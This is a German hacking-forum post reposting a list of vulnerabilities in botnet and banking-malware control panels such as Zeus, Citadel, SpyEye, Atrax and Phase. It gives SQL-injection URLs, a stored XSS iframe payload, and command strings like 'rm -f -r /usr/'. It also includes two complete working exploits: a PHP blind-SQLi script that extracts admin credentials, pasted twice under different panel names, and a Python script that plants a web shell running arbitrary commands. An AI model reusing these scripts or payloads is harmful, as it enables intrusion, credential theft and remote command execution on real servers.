Anmelden
Benutzerkonto erstellen
Hallo,
hab ne liste von Sicherheitslücken in diversen Bots auf meiner Festplatte gefunden. Die Liste ist nicht von mir!
Kp ob davon noch was aktuell ist, poste sie trotzdem hier.
Athena
Quote:
Type: SQLi
Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&country_code=AUD &ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now
Casinoloader
Quote:
Type: SQLi
Vuln: http://localhost/gateway.php
POSTDATA page=1&val=1
Citadel
Quote:
Type: SQLi
Vuln: http://localhost/cp.php?bots=1
CYTHOSIA BOTNET
Quote:
Type: Stored XSS and iFrame redirect
Click add task Command: IFRAME SRC="whateverekorlemonpartyorwhatnot.com" /IFRAME
Then Click Create Task Finally click Tasks. VOILA!
(Credits to asterea for finding this botnet panel)
DLOADER
Quote:
Type: SQLi
Vuln1: http://localhost/includes/get_kktocc.php?line=1
Vuln2: http://localhost/includes/update_url.php?fid=1
HERPES
Quote:
SQL injection.
http://localhost/tasks.php POST: vote=1&submitted=1
SAKURA
Quote:
Type: SQLi
http://localhost/func.php?showtopic=2 http://localhost/index.php?showtopic=322 http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312 http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor http://localhost/sakuraadmin44.php?link=http%3A%2F%2Fmetasploit.com%2F&threads=10 http://localhost/showthread.php?t=123 http://localhost/showthread.php?t=23&cmd=32
Type: SQLi - POST
http://localhost/sakuraadmin44.php?threads=222&link=21213.com POST: exploits=992.ds http://localhost/sakuraadmin44.php?threads=11 POST: snick=123&file=321&exploits=123 http://localhost/sakuraadmin44.php?threads=21 POST: snick=1
SILENCE WINLOCKER V5.0
Quote:
SQL injection.
http://localhost/forma.php?pin=4322 http://localhost/index.php?x=1&act=delete&id=1 http://localhost/picture.php?pin=8787 http://localhost/tmp/get.php?pin=1334
SMOKE LOADER
Quote:
Type: SQLi
http://localhost/control.php?id=1 http://localhost/guest.php?id=1
POST
SOLARBOT
Quote:
SQL injection.
localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD
SPY-EYE
Quote:
Type: SQLi
http://localhost/frm_boa-grabber_sub.php?dt=11%2F11%2F1998
TINBA
Quote:
Type: SQLi
\tinybanker panel\admin/control/logs.act.php http://localhost/logs.act.php Post Data: bot_uid=1&botcomment=mate
UMBRA
Quote:
Type: SQLi
Vuln: http://localhost/delete_command.php?deleteID=1
ZEUS AND ZEUS EVO
Quote:
Type: SQLi
Vuln: http://localhost/gate.php?ip=8.8.8.8
ZSKIMMER
Quote:
Type: SQLi
Vuln: http://localhost/process.php?xy=2
iBanking
Quote:
Type: Shell upload
shell: <?php
// Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
// Start with PHP CLI (php pwn.php)
set_time_limit(0);
// Adjust this :)
define('SLEEP_TIME', '4');
define('PAGE_TIME', 4);
define('URL', 'http://localhost/Phase/');
echo('attacking ' . URL . PHP_EOL);
get_string('username');
get_string('password');
function get_length($field) {
$length = 1;
while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
++$length;
}
echo($field . ' length: ' . $length . PHP_EOL);
return $length;
}
function get_string($field) {
$length = get_length($field);
$str = '';
for ($i = 0; $i < $length; ++$i) {
$str .= chr(get_char($field, $i));
echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
}
return $str;
}
function get_char($field, $id) {
$binary = '';
for ($i = 1; $i < 256; $i *= 2) {
if ($i == 128)
$binary = '0' . $binary;
else
$binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
}
return bindec($binary);
}
function is_true($query) {
$rc4_key = 'aaaa'; // b d u
$data = 'u=tapz&d=faggot&b=lol';
$encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
$encode = $rc4_key . $encode;
$injection = urlencode($query);
$req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
return !($req['time'] < PAGE_TIME);
}
function post_request($url, $data) {
$handle = curl_init($url);
curl_setopt($handle, CURLOPT_HEADER, false);
curl_setopt($handle, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($handle, CURLOPT_POST, true);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_TIMEOUT, 30);
$time = microtime(true);
$page = curl_exec($handle);
$time = microtime(true) - $time;
curl_close($handle);
return array(
'page' => $page,
'time' => $time
);
}
function rc4($pwd, $data, $data_length, $pwd_length){
$key[] = '';
$box[] = '';
$cipher = '';
for ($i = 0; $i < 256; $i++)
{
$key[$i] = ord($pwd[$i % $pwd_length]);
$box[$i] = $i;
}
for ($j = $i = 0; $i < 256; $i++)
{
$j = ($j + $box[$i] + $key[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for ($a = $j = $i = 0; $i < $data_length; $i++)
{
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$k = $box[(($box[$a] + $box[$j]) % 256)];
$cipher .= chr(ord($data[$i]) ^ $k);
}
return $cipher;
}
Atrax botnet
Quote:
Type: Shell Upload
Shell: #!/usr/bin/python
import random
import string
import base64
import urllib
import urllib2
# <CONFIG>
payload = '<pre><?php if(isset($_GET["c"]))system($_GET["c"]);else echo("No input?");?></pre>'
url = 'http://localhost/atrax/'
# </CONFIG>
BOT_MODE_INSERT = 'b' # BOT MODE
BOT_MODE_RUNPLUGIN = 'e'
GET_PARAM_MODE = 'a' # GET PARAM
POST_PARAM_GUID = 'h' # POST PARAM
POST_PARAM_IP = 'i'
POST_PARAM_BUILDID = 'j'
POST_PARAM_PC = 'k'
POST_PARAM_OS = 'l'
POST_PARAM_ADMIN = 'm'
POST_PARAM_CPU = 'n'
POST_PARAM_GPU = 'o'
POST_PARAM_PLUGINNAME = 'q'
def request(url, get, post):
if not get == '':
url += '?' + get
encoded = {}
if not post == '':
for _ in post.split('&'):
data = _.split('=')
encoded[data[0]] = data[1]
encoded = urllib.urlencode(encoded)
request = urllib2.Request(url, encoded)
response = urllib2.urlopen(request)
page = response.read()
return page
def queryValue(key, value, next=True):
ret = key + '=' + value
if next:
ret += '&'
return ret
def randomString(length = 8):
return ''.join(random.choice(string.ascii_lowercase + string.digits) for i in range(length))
def createVictim(url, guid, ip):
get = queryValue(GET_PARAM_MODE, BOT_MODE_INSERT, False)
post = queryValue(POST_PARAM_GUID, guid)
post += queryValue(POST_PARAM_IP, ip)
post += queryValue(POST_PARAM_BUILDID, randomString())
post += queryValue(POST_PARAM_PC, randomString())
post += queryValue(POST_PARAM_OS, randomString())
post += queryValue(POST_PARAM_ADMIN, 'yes')
post += queryValue(POST_PARAM_CPU, randomString())
post += queryValue(POST_PARAM_GPU, randomString(), False)
return request(url + 'auth.php', get, post)
def exploit(url, guid, ip, file, payload):
get = queryValue(GET_PARAM_MODE, BOT_MODE_RUNPLUGIN, False)
post = queryValue(POST_PARAM_PLUGINNAME, 'atraxstealer')
post += queryValue(POST_PARAM_GUID, guid)
post += queryValue(POST_PARAM_IP, ip)
post += queryValue('am', randomString())
post += queryValue('ad', file)
post += queryValue('ab', base64.b64encode(payload))
post += queryValue('ai', '18', False)
request(url + 'auth.php', get, post)
def testExploit(url, guid, ip):
file = randomString() + '.php'
payload = '<?php echo("1337"); ?>'
exploit(url, guid, ip, file, payload)
return request(url + 'plugins/atraxstealer/wallet/' + file, '', '').strip() == '1337'
guid = '7461707a7461707a7461707a7461707a'
ip = '91.224.13.103'
file = randomString() + '.php'
if createVictim(url, guid, ip).strip() == 'STOP':
print '[-] Cannot create victim...'
else:
print '[~] Victim created/updated...'
if testExploit(url, guid, ip):
exploit(url, guid, ip, file, payload)
print '[+] Exploit uploaded!'
print '=> ' + url + 'plugins/atraxstealer/wallet/' + file
else:
print '[-] Cannot upload payload, maybe the plugin is not actived?'
Phase botnet
Quote:
Type: blind SQLi
Vuln: <?php
// Panel.zip hash: c49c74a609b24284a0a66fc008c4d8f2
// Start with PHP CLI (php pwn.php)
set_time_limit(0);
// Adjust this :)
define('SLEEP_TIME', '4');
define('PAGE_TIME', 4);
define('URL', 'http://localhost/Phase/');
echo('attacking ' . URL . PHP_EOL);
get_string('username');
get_string('password');
function get_length($field) {
$length = 1;
while (!is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (LENGTH(value)=" . $length . ") OR SLEEP(" . SLEEP_TIME . "))-- ")) {
++$length;
}
echo($field . ' length: ' . $length . PHP_EOL);
return $length;
}
function get_string($field) {
$length = get_length($field);
$str = '';
for ($i = 0; $i < $length; ++$i) {
$str .= chr(get_char($field, $i));
echo($field . ' : ' . str_pad($str, $length, '*') . PHP_EOL);
}
return $str;
}
function get_char($field, $id) {
$binary = '';
for ($i = 1; $i < 256; $i *= 2) {
if ($i == 128)
$binary = '0' . $binary;
else
$binary = (is_true("' UNION SELECT ALL 1,2,3,4,5,6,7 FROM `settings` WHERE `key` = '" . $field . "' AND (NOT (ORD(SUBSTR(`value`," . ($id + 1) . ",1)) & " . $i . ") OR SLEEP(" . SLEEP_TIME . "))-- ") ? '1' : '0') . $binary;
}
return bindec($binary);
}
function is_true($query) {
$rc4_key = 'aaaa'; // b d u
$data = 'u=tapz&d=faggot&b=lol';
$encode = rc4($rc4_key, $data, strlen($data), strlen($rc4_key));
$encode = $rc4_key . $encode;
$injection = urlencode($query);
$req = post_request(URL . 'gate.php?i=127.0.0.1' . $injection, $encode);
return !($req['time'] < PAGE_TIME);
}
function post_request($url, $data) {
$handle = curl_init($url);
curl_setopt($handle, CURLOPT_HEADER, false);
curl_setopt($handle, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36');
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($handle, CURLOPT_POST, true);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_TIMEOUT, 30);
$time = microtime(true);
$page = curl_exec($handle);
$time = microtime(true) - $time;
curl_close($handle);
return array(
'page' => $page,
'time' => $time
);
}
function rc4($pwd, $data, $data_length, $pwd_length){
$key[] = '';
$box[] = '';
$cipher = '';
for ($i = 0; $i < 256; $i++)
{
$key[$i] = ord($pwd[$i % $pwd_length]);
$box[$i] = $i;
}
for ($j = $i = 0; $i < 256; $i++)
{
$j = ($j + $box[$i] + $key[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for ($a = $j = $i = 0; $i < $data_length; $i++)
{
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$k = $box[(($box[$a] + $box[$j]) % 256)];
$cipher .= chr(ord($data[$i]) ^ $k);
}
return $cipher;
}
Nach oben
Melden
Classic Hacking
Leaks
Hacking & Security
